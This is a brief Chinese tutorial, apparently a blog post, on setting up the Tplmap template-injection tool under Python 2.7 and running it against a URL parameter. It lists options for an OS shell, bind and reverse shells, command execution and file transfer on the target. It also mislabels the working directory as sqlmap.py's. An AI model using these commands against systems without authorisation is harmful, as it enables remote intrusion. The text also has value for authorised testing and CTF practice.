Tplmap下载:安装包可查看我的下载资源页面
Python环境:2.7 (这一点很重要很重要很重要)
Python所需要的包:
PyYAML5.1.2
certifi2018.10.15
chardet3.0.4
idna2.8
requests2.22.0
urllib31.24.1
wsgiref==0.1.2
(这些包只有在python2.X中才有安装)
进入到sqlmap.py目录下,运行命令行窗口:
命令:python tplmap.py -u “URL/?flag”
-u指定URL的地址
?flag是你要注入的参数
运行之后,会出现
**--os-shell Run shell on the target**
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
然后指定 --os-shell,就可以进入到shell